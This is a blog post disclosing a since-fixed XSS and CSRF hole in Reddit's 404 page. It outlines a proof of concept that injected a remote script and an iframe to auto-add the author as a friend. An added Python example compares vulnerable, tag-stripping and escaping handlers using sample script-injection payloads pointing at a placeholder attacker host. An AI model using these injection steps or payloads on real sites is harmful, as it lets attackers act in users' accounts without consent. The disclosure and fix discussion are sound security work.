XSS Hole in Reddit Allows Gaping Access: Proof of Concept
Fixed by Reddit.
So, a few months back Digg added a new feature that allowed users to invite and add friends more easily. Unfortunately, as I reported then, that feature exposed a hole that let a third-party site add friends automatically for any visitor who was still logged into Digg.
That story did quite well on Reddit (the two sites are often considered rivals), actually outperforming the same story on Digg, where it was, unsurprisingly, quickly buried.
Nevertheless, an XSS hole in Reddit's handling of non-existent pages (its 404 page) creates a gaping hole that lets a third-party site perform almost any site function it wants on the visitor's behalf. To be fair to Reddit, I figured the Proof of Concept should mimic the one I did for Digg: an auto friend adder. If you are reading this page while logged into Reddit, and the hole has not yet been fixed, you will add “rjonesx” as a friend.
By using the most basic XSS and CSRF techniques, I was able to do the following…
- Inject a remote script onto a 404 page (http://www.thegooglecache.com/reddit-friends-adder.js)
- Inject into that same 404 page an iframe that loads the /prefs/friends page
- Use the remote script, after a basic timed delay, to fill out and submit the form on the /prefs/friends page, adding rjonesx as a friend
The solution, of course, is as simple as any good XSS fix: don’t echo the contents of the URL into the page. If you must, strip all HTML from it first.
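As an added illustration (not code from the original post or from Reddit), here is a small Python model of the 404 handler described above: one version reflects the requested path verbatim, one applies the post's advice of stripping HTML, and a third HTML-encodes the path instead. The sample paths, the host name attacker.invalid and all function names are constructed for this example. It goes one step beyond the post by also feeding each handler an unclosed tag, which shows why encoding is the more robust of the two fixes.

```python
import html
import re

# Constructed sample paths modelled on the class of input the post describes
# (not the original payload). The host name attacker.invalid is a placeholder.
SAMPLE_PATH = '/no-such-page"><script src="http://attacker.invalid/x.js"></script>'
UNCLOSED_PATH = '/no-such-page<script src=http://attacker.invalid/x.js'

# The 404 page: a fixed prefix, the reflected path, a fixed suffix.
PREFIX = "<html><body><h1>404 Not Found</h1><p>No page at "
SUFFIX = "</p></body></html>"


def render_404_vulnerable(path):
    """The bug: the path is echoed verbatim, so markup in the URL becomes markup in the page."""
    return PREFIX + path + SUFFIX


TAG_RE = re.compile(r"<[^>]*>")


def render_404_stripped(path):
    """The post's suggested fix: remove anything that looks like a complete tag."""
    return PREFIX + TAG_RE.sub("", path) + SUFFIX


def render_404_escaped(path):
    """Output encoding: every <, >, &, " and ' is turned into an entity, so the
    browser renders the path as text and never parses it as markup."""
    return PREFIX + html.escape(path, quote=True) + SUFFIX


HANDLERS = {
    "vulnerable": render_404_vulnerable,
    "stripped": render_404_stripped,
    "escaped": render_404_escaped,
}

# Elements that can load or run content supplied by whoever crafted the URL.
ACTIVE_RE = re.compile(r"<(script|iframe|img|svg|object|embed)\b", re.IGNORECASE)


def reflects_active_markup(page):
    """Detection check: does the rendered page contain an active element?"""
    return ACTIVE_RE.search(page) is not None


def leaks_raw_angle_brackets(page):
    """True if the page contains more '<' characters than the template itself has,
    i.e. the reflected path contributed raw markup."""
    return page.count("<") > (PREFIX + SUFFIX).count("<")


def compare_handlers(path):
    """Run every handler on one path and report which outputs still carry active markup."""
    return {name: reflects_active_markup(fn(path)) for name, fn in HANDLERS.items()}


if __name__ == "__main__":
    for label, path in (("closed tag", SAMPLE_PATH), ("unclosed tag", UNCLOSED_PATH)):
        print(label, compare_handlers(path))
```

The stripping handler behaves correctly on a tidy, closed tag, but a tag that never closes passes through the regex untouched and the browser still sees a script element; the encoding handler neutralises both inputs because it does not try to recognise markup at all, it simply makes the path unparseable as markup. That is why escaping on output, rather than a blacklist, is the usual recommendation for reflected values.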
3 Comments
Trackbacks/Pingbacks
- Stumbleupon Cross-Site Scripting Vulnerability - [...] I have previously identified XSS and/or CSRF vulnerabilities in both Digg and Reddit, Stumbleupon has largely remained innocuous to…
The latest version of Firefox’s NoScript extension (since he started calling it “the XSS Punisher”) easily prevents your demo.
Cheers!
Note: that extension deserves a link! Excellent. Thanks for pointing it out, Aerik.
I noticed that when I marked this domain untrusted, and even after I added *googlecache* to adblock plus, Noscript 1.1.4.9… was still telling me about sanitizing your demo here. I asked NoScript’s developer to allow us to remove the URI about:neterror from the whitelist. He took my advice, and has updated to 1.1.5. I’ve removed about:neterror from the whitelist, and now finally, your demo doesn’t even get far enough to need sanitizing. It’s a damn good extension.
Oh, wait… I saw just now, after the page refreshed, that Reddit fixed the problem. My bad. XO